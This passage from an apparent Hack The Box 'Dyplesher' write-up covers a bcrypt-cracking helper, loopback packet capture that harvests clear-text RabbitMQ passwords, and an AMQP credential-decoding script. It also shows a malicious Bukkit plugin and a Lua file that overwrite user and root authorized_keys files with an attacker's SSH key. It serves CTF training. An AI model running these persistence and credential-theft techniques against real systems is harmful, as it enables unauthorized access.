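        return [("unknown", h.decode()) for h in scan_raw_for_bcryp_bytes(path.read_bytes())]


def bcrypt_cost(h: str) -> int:
    """Work factor: 2**cost rounds; john reports it as 'iteration count' (1024 for cost 10)."""
    return int(h.split("$")[2])


def john_lines(rows) -> list:
    """john accepts user:hash; bcrypt is auto-detected (or force it with --format=bcrypt)."""
    return [f"{user}:{h}" for user, h in rows if BCRYPT_RE.fullmatch(h.encode())]


def demo() -> list:
    db = Path(tempfile.mkdtemp()) / "users.db"
    build_sample_db(db)
    return john_lines(extract_hashes(db))


if __name__ == "__main__":
    for line in demo():
        print(line, "cost", bcrypt_cost(line.split(":", 1)[1]))
```

The cost matters for planning: the hash from users.db is $2a$10 (1024 rounds, which john confirms above), so rockyou finishes in seconds, whereas the $2y$12 hash from memcached costs four times as much per guess.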

Bukkit java plugin

The cracked password worked on http://dyplesher.htb/home/console.
A first attempt with an msfvenom-generated jar failed: the loader complained the name was too long, and a Bukkit plugin has to follow a specific layout (a plugin.yml plus a main class extending JavaPlugin) to be loaded at all.
bukkit.yml, in the same repository as users.db, shows the console is managing Bukkit plugins for the Minecraft server (https://bukkit.gamepedia.com/Main_Page).
The main site leads to the plugin writing guide at https://bukkit.gamepedia.com/Plugin_Tutorial.
The next step is a new Maven project:
mvn archetype:generate -DgroupId=htb.dyplesher -DartifactId=xnaaro-plug
With the project skeleton in place, I followed the guide and adapted the parts Bukkit requires.
First, pom.xml. Below is my configuration; the 1.12.2 API matches the versions the Minecraft service on port 25565 advertised in the Nmap fingerprint (1.8.x to 1.12.x). The manifest's mainClass entry is left over from the archetype and does not match the plugin class, but Bukkit ignores it and loads the class named in plugin.yml, so it is harmless.
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>htb.dyplesher</groupId>
  <artifactId>xnaaro</artifactId>
  <packaging>jar</packaging>
  <version>1.2-SNAPSHOT</version>
  <name>xnaaro</name>
  <url>http://maven.apache.org</url>
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>org.bukkit</groupId>
      <artifactId>bukkit</artifactId>
      <version>1.12.2-R0.1-SNAPSHOT</version><!--change this value depending on the version or use LATEST-->
      <type>jar</type>
      <scope>provided</scope>
    </dependency>
    <dependency>
      <groupId>org.spigotmc</groupId>
      <artifactId>spigot-api</artifactId>
      <version>1.12.2-R0.1-SNAPSHOT</version><!--change this value depending on the version-->
      <type>jar</type>
      <scope>provided</scope>
    </dependency>
  </dependencies>
  <properties>
    <maven.compiler.source>1.6</maven.compiler.source>
    <maven.compiler.target>1.6</maven.compiler.target>
  </properties>
  <repositories>
    <repository>
      <id>bukkit-repo</id>
      <url>https://hub.spigotmc.org/nexus/content/repositories/snapshots/</url>
    </repository>
  </repositories>
  <build>
    <plugins>
      <plugin>
        <!-- Build an executable JAR -->
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-jar-plugin</artifactId>
        <version>3.1.0</version>
        <configuration>
          <archive>
            <manifest>
              <addClasspath>true</addClasspath>
              <classpathPrefix>lib/</classpathPrefix>
              <mainClass>htb.dyplesher.App</mainClass>
            </manifest>
          </archive>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
Second, src/main/resources/plugin.yml, where Bukkit reads the plugin name and the main class to load:
name: xnaaro
main: htb.dyplesher.Xnaaro
version: 1.0.2
The last file is src/main/java/htb/dyplesher/Xnaaro.java, which holds the code that actually runs on the server.
The class must extend JavaPlugin; Bukkit calls onEnable() when the plugin is enabled, so that is where the payload goes.
A reverse shell was my first attempt, but it never connected because the box firewalls outgoing connections.
After enumerating the box a bit, I saw the commands were running as the MinatoTW user.
So I simply wrote my SSH public key into that user's authorized_keys file:
package htb.dyplesher;

import org.bukkit.plugin.java.JavaPlugin;
import java.io.FileWriter;
import java.io.IOException;

public class Xnaaro extends JavaPlugin {

    @Override
    public void onDisable() {
        System.out.println("Plugin disabled");
    }

    // Bukkit calls onEnable() when the plugin is enabled from the console,
    // so the payload runs here, as the server's user (MinatoTW).
    @Override
    public void onEnable() {
        try {
            // Mode "w": this replaces any existing authorized_keys for the user.
            FileWriter myWriter = new FileWriter("/home/MinatoTW/.ssh/authorized_keys");
            myWriter.write("ssh-rsa <YOUR_PUBLIC_KEY> <comment>");
            myWriter.close();
        } catch (IOException e) {
            System.out.println("An error occurred.");
            e.printStackTrace();
        }
    }
}
Finally, build the .jar with Maven:
mvn package
To trigger the code, upload the jar through the console and then enable it there. The uploaded file shows up in the plugin list under a long hash, but enabling it by the plugin name from plugin.yml (xnaaro in my case) ran onEnable() as expected.
That gives SSH access as MinatoTW:
$ ssh MinatoTW@10.10.10.190 -i id_rsa
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

System information disabled due to load higher than 2.0


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


Last login: Wed May 20 13:44:56 2020 from 10.10.14.4

Felamos user

Enumerating as MinatoTW, the user turns out to be a member of the wireshark group (on Debian/Ubuntu that group may run dumpcap with capture privileges, so tshark works without root):
MinatoTW@dyplesher:~$ cat /etc/group | grep -i minato
MinatoTW:x:1001:
wireshark:x:122:MinatoTW
RabbitMQ and memcached are both talking on localhost in clear text, so capturing on all interfaces (loopback included) may expose credentials or data:
MinatoTW@dyplesher:~$ tshark -ni any -w data.pcap
Capturing on 'any'
427
Copy the capture to the attacking machine:
$ scp -i id_rsa MinatoTW@10.10.10.190:data.pcap .
data.pcap                                     100%   50KB 474.6KB/s   00:00
Reading the payloads, a batch of messages published to the subscribers queue contains plain-text JSON records with passwords, including ones for MinatoTW, yuntao and felamos:
$ tcpick -C -yP -r data2.pcap | grep subscribers
...subscribers.direct......
........2.....sub.subscribers.......
........<.(...subscribers......... .<.............application/json.........{"name":"Mafalda Wuckert I","email":"[email protected]","address":"84889 Mayert Coves Apt. 784\nEast Tabithahaven, CO 07102","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Berenice Hill","email":"[email protected]","address":"237 Frank Trail Suite 931\nDareside, SD 21507","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Dr. Hailie Gleichner","email":"[email protected]","address":"47786 Koelpin Hills\nNew Abigailshire, NC 91337","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Francis Glover","email":"[email protected]","address":"872 Wilton Land\nLauraview, PA 54556","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Ryann Quigley","email":"[email protected]","address":"925 Ritchie Harbor\nWest Esperanza, FL 50235-9309","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Peyton Reynolds","email":"[email protected]","address":"644 Bauch Spur\nNew Mustafa, OH 10892","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Prof. Catalina Kessler IV","email":"[email protected]","address":"8527 Scottie Neck\nPort Charlie, WV 87089","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Dr. Roselyn Ebert","email":"[email protected]","address":"9225 Zulauf Plaza Suite 751\nEast Obiemouth, PA 90425-1897","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Edgar Osinski","email":"[email protected]","address":"92938 Toy Lock Suite 064\nNew Rossie, MT 63835","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Gennaro Romaguera","email":"[email protected]","address":"39874 Serena Extensions Apt. 100\nEmanuelborough, MD 38535-4626","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.............application/json.........{"name":"Gennaro Romaguera","email":"[email protected]","address":"39874 Serena Extensions Apt. 100\nEmanuelborough, MD 38535-4626","password":"B9YXOT2VmiDh","subscribed":true}.
........<.(...subscribers......... .<.........q...application/json........q{"name":"MinatoTW","email":"[email protected]","address":"India","password":"bixxxxxxFov","subscribed":true}.
........<.(...subscribers......... .<.........l...application/json........l{"name":"yuntao","email":"[email protected]","address":"Italy","password":"waxxxxxxob","subscribed":true}.
........<.(...subscribers......... .<.........p...application/json........p{"name":"felamos","email":"[email protected]","address":"India","password":"tixxxxxxxxxg","subscribed":true}.
The captured passwords worked for SSH as felamos and as yuntao:
felamos@10.10.10.190's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 05 Jun 2020 02:39:08 PM UTC

  System load:  0.0                Processes:               254
  Usage of /:   6.9% of 97.93GB    Users logged in:         1
  Memory usage: 33%                IP address for ens33:    10.10.10.190
  Swap usage:   0%                 IP address for docker0:  172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings


Last login: Thu Apr 23 17:33:41 2020 from 192.168.0.103
uid=1000(felamos) gid=1000(felamos) groups=1000(felamos)
felamos@dyplesher:~$ cat user.txt
a2ff93xxxxxxxxxxxxxxxxxxx

Cuberite

Inside felamos' home directory there is a script with a hint about what to target next:
a service that reads the RabbitMQ plugin_data queue, downloads the URL it receives and reviews the plugin.
felamos@dyplesher:~$ cat yuntao/send.sh
#!/bin/bash

echo 'Hey yuntao, Please publish all cuberite plugins created by players on plugin_data "Exchange" and "Queue". Just send url to download plugins and our new code will review it and working plugins will be added to the server.' > /dev/pts/{}
The process list shows what is running: the Cuberite server from MinatoTW's home, the Paper Minecraft server (paper.jar) and a PHP script under /root/work:
  PID TTY      STAT   TIME COMMAND
  995 tty1     Ss+    0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
 1017 pts/1    Ssl+   0:18 /home/MinatoTW/Cuberite/Cuberite
 1026 pts/2    Ssl+   2:47 /usr/bin/java -Xms512M -Xmx512M -jar paper.jar
 2167 pts/0    Ss+    0:00 /usr/bin/php /root/work/com.php
 3657 pts/4    Ss     0:00 -bash
 4594 pts/4    S      0:00 bash
20468 pts/4    R+     0:00 ps a
Cuberite is a C++ Minecraft server whose plugins are written in Lua (https://book.cuberite.org/#0.1), so the "plugin" we publish has to be a Lua file.
Reading the queues requires authentication. The same capture also contains the AMQP Connection.Start-Ok frame from a PHP AMQPLib client, and its AMQPLAIN response carries yuntao's login and password as a plain LOGIN/PASSWORD table:
. .....capabilitiesF.....publisher_confirmst..exchange_exchange_bindingst.
basic.nackt..consumer_cancel_notifyt..connection.blockedt..consumer_prioritiest..authentication_failure_closet..per_consumer_qost..direct_reply_tot..cluster_nameS....[email protected] copyrightS....Copyright (C) 2007-2018 Pivotal Software, Inc..informationS...5Licensed under the MPL. See http://www.rabbitmq.com/.platformS....Erlang/OTP 22.0.7.productS....RabbitMQ.versionS....3.7.8....PLAIN AMQPLAIN....en_US.
......=.
.......productS....AMQPLib.platformS....PHP.versionS....2.11.1.informationS.... copyrightS.....capabilitiesF.....authentication_failure_closet..publisher_confirmst..consumer_cancel_notifyt..exchange_exchange_bindingst.
ExxxxxxxxxxxOp.en_US.ion.blockedt..AMQPLAIN...,.LOGINS....yuntao.PASSWORDS...
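To make that dump readable, here is the AMQP 0-9-1 handshake framing as an added example (my own code, not the write-up's, RabbitMQ's or php-amqplib's): it constructs a Connection.Start frame like the server's and a Connection.Start-Ok frame like the PHP client's, then walks a reassembled stream, finds the Start-Ok and decodes the credentials for both mechanisms RabbitMQ offered here, PLAIN (NUL user NUL password) and AMQPLAIN (a field table of LOGIN and PASSWORD long strings, sent without its 4-byte length prefix). The client properties mirror the capture; the password is made up.

```python
"""AMQP 0-9-1 Connection.Start / Start-Ok framing and clear-text credential recovery."""
import struct

FRAME_METHOD, FRAME_END = 1, 0xCE
CLASS_CONNECTION, METHOD_START, METHOD_START_OK = 10, 10, 11


def shortstr(s: bytes) -> bytes:
    return bytes([len(s)]) + s


def longstr(s: bytes) -> bytes:
    return struct.pack("!I", len(s)) + s


def encode_table(items: dict) -> bytes:
    """Field table: 4-byte length, then name(shortstr) type(octet) value; only the types used here."""
    body = b""
    for name, value in items.items():
        if isinstance(value, bool):
            body += shortstr(name.encode()) + b"t" + bytes([value])
        elif isinstance(value, bytes):
            body += shortstr(name.encode()) + b"S" + longstr(value)
        elif isinstance(value, dict):
            body += shortstr(name.encode()) + b"F" + encode_table(value)
        else:
            raise TypeError(f"unsupported table value for {name}: {type(value).__name__}")
    return longstr(body)


def plain_response(login: str, password: str) -> bytes:
    return b"\x00" + login.encode() + b"\x00" + password.encode()


def amqplain_response(login: str, password: str) -> bytes:
    """LOGIN/PASSWORD table without the leading table length (the longstr carries the size)."""
    return encode_table({"LOGIN": login.encode(), "PASSWORD": password.encode()})[4:]


def method_frame(channel: int, class_id: int, method_id: int, args: bytes) -> bytes:
    payload = struct.pack("!HH", class_id, method_id) + args
    return struct.pack("!BHI", FRAME_METHOD, channel, len(payload)) + payload + bytes([FRAME_END])


def start_frame(server_props: dict, mechanisms: bytes = b"PLAIN AMQPLAIN") -> bytes:
    """Server -> client: protocol 0-9, server properties, offered mechanisms, locales."""
    args = bytes([0, 9]) + encode_table(server_props) + longstr(mechanisms) + longstr(b"en_US")
    return method_frame(0, CLASS_CONNECTION, METHOD_START, args)


def start_ok_frame(client_props: dict, mechanism: str, response: bytes) -> bytes:
    """Client -> server: client properties, chosen mechanism, SASL response, locale."""
    args = encode_table(client_props) + shortstr(mechanism.encode()) + longstr(response) + shortstr(b"en_US")
    return method_frame(0, CLASS_CONNECTION, METHOD_START_OK, args)


def read_shortstr(buf: bytes, i: int):
    n = buf[i]
    return buf[i + 1:i + 1 + n], i + 1 + n


def read_longstr(buf: bytes, i: int):
    n = struct.unpack_from("!I", buf, i)[0]
    return buf[i + 4:i + 4 + n], i + 4 + n


def decode_table_body(buf: bytes, i: int, end: int) -> dict:
    out = {}
    while i < end:
        name, i = read_shortstr(buf, i)
        kind, i = buf[i:i + 1], i + 1
        if kind == b"S":
            value, i = read_longstr(buf, i)
        elif kind == b"t":
            value, i = bool(buf[i]), i + 1
        elif kind == b"F":
            n = struct.unpack_from("!I", buf, i)[0]
            value, i = decode_table_body(buf, i + 4, i + 4 + n), i + 4 + n
        else:
            raise ValueError(f"unsupported field type {kind!r} for {name!r}")
        out[name.decode()] = value
    return out


def decode_table(buf: bytes, i: int):
    n = struct.unpack_from("!I", buf, i)[0]
    return decode_table_body(buf, i + 4, i + 4 + n), i + 4 + n


def decode_credentials(mechanism: str, response: bytes) -> tuple:
    if mechanism == "PLAIN":
        _authzid, login, password = response.split(b"\x00", 2)
        return login.decode(), password.decode()
    if mechanism == "AMQPLAIN":
        table = decode_table_body(response, 0, len(response))
        return table["LOGIN"].decode(), table["PASSWORD"].decode()
    raise ValueError(f"mechanism {mechanism} does not expose a reusable password")


def find_start_ok(stream: bytes):
    """Walk frames of a reassembled stream, decode the first Connection.Start-Ok, else None."""
    i = 0
    while i + 8 <= len(stream):
        ftype, _channel, size = struct.unpack_from("!BHI", stream, i)
        end = i + 7 + size
        if end >= len(stream) or stream[end] != FRAME_END:
            return None  # truncated or not frame-aligned
        payload = stream[i + 7:end]
        if ftype == FRAME_METHOD and size >= 4 and \
                struct.unpack_from("!HH", payload) == (CLASS_CONNECTION, METHOD_START_OK):
            props, j = decode_table(payload, 4)
            mech, j = read_shortstr(payload, j)
            resp, j = read_longstr(payload, j)
            return {"client_properties": props, "mechanism": mech.decode(),
                    "credentials": decode_credentials(mech.decode(), resp)}
        i = end + 1
    return None


# Constructed handshake resembling the capture: RabbitMQ's Start, then php-amqplib's Start-Ok.
SAMPLE_STREAM = start_frame({"product": b"RabbitMQ", "version": b"3.7.8"}) + start_ok_frame(
    {"product": b"AMQPLib", "platform": b"PHP", "version": b"2.11.1",
     "capabilities": {"publisher_confirms": True, "consumer_cancel_notify": True}},
    "AMQPLAIN", amqplain_response("yuntao", "example-password"))

if __name__ == "__main__":
    print(find_start_ok(SAMPLE_STREAM))
```

Read against the dump above: after the literal "AMQPLAIN" comes the response length, whose last byte prints as "," (0x2c = 44), then the 5-byte name LOGIN, type S, a 4-byte length and "yuntao", then PASSWORD and its value; 44 bytes with a 6-character login leaves room for a 13-character password. Neither mechanism protects the secret on the wire, which is why AMQP without TLS on a shared host is a credential leak to anyone who can capture loopback traffic.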
I then wrote a short pika script, following https://www.rabbitmq.com/tutorials/tutorial-one-python.html, to connect to RabbitMQ as yuntao and publish a message to the plugin_data queue.
The consumer expects a URL to download, and outgoing connections are blocked by the firewall.
So the only option is to host the file on the box itself and point the URL at localhost (a python3 -m http.server on port 4443 in my case):
import pika

# yuntao's AMQP password, recovered from the capture (elided here)
credentials = pika.PlainCredentials('yuntao', 'Exxxxxxxxxxxxp')
parameters = pika.ConnectionParameters('10.10.10.190', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
# The reviewer downloads whatever URL it receives; outbound traffic is firewalled,
# so the Lua file is served from the box itself on 127.0.0.1:4443.
body = 'http://127.0.0.1:4443/exploit.lua'
channel = connection.channel()

channel.queue_declare(queue='plugin_data',
                      durable=True)

channel.basic_publish(exchange='',
                      routing_key='plugin_data',
                      body=body)
connection.close()
Contents of the Lua "plugin", served from inside the box.
The method is the same as for the low-privileged shell: write our SSH public key into root's authorized_keys (the reviewer that loads the plugin runs with enough privilege to write under /root, as the result shows):
-- Executed by the plugin reviewer when it loads the downloaded file.
file = io.open("/root/.ssh/authorized_keys", "w")
file:write("ssh-rsa <YOUR_PUBLIC_KEY> <comment>")
file:close()
I had to run the publish script a couple of times before it worked as expected (it runs from the attacking machine against port 5672, while the HTTP server runs on the box as felamos):
python3 exploit.py
The web server log on the box confirms the service fetched the Lua file:
felamos@dyplesher:/tmp$ python3 -m http.server 4443
Serving HTTP on 0.0.0.0 port 4443 (http://0.0.0.0:4443/) ...
127.0.0.1 - - [05/Jun/2020 16:48:31] "GET /exploit.lua HTTP/1.0" 200 -

Root

With the key in place, SSH as root works:
$ ssh root@10.10.10.190 -i id_rsa
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 05 Jun 2020 04:48:35 PM UTC

  System load:  0.04               Processes:               263
  Usage of /:   6.7% of 97.93GB    Users logged in:         2
  Memory usage: 40%                IP address for ens33:    10.10.10.190
  Swap usage:   1%                 IP address for docker0:  172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings


Last login: Sun May 24 03:33:34 2020
uid=0(root) gid=0(root) groups=0(root)
root@dyplesher:~# hostname
dyplesher
root@dyplesher:~# cat root.txt
dfd34xxxxxxxxxxxxxxxxxxxxx
This box took me 25 hours of work, most of it in enumeration; once you understand how the services behave, the rest follows from some research and the developer guides.
Hope you liked it, happy hacking!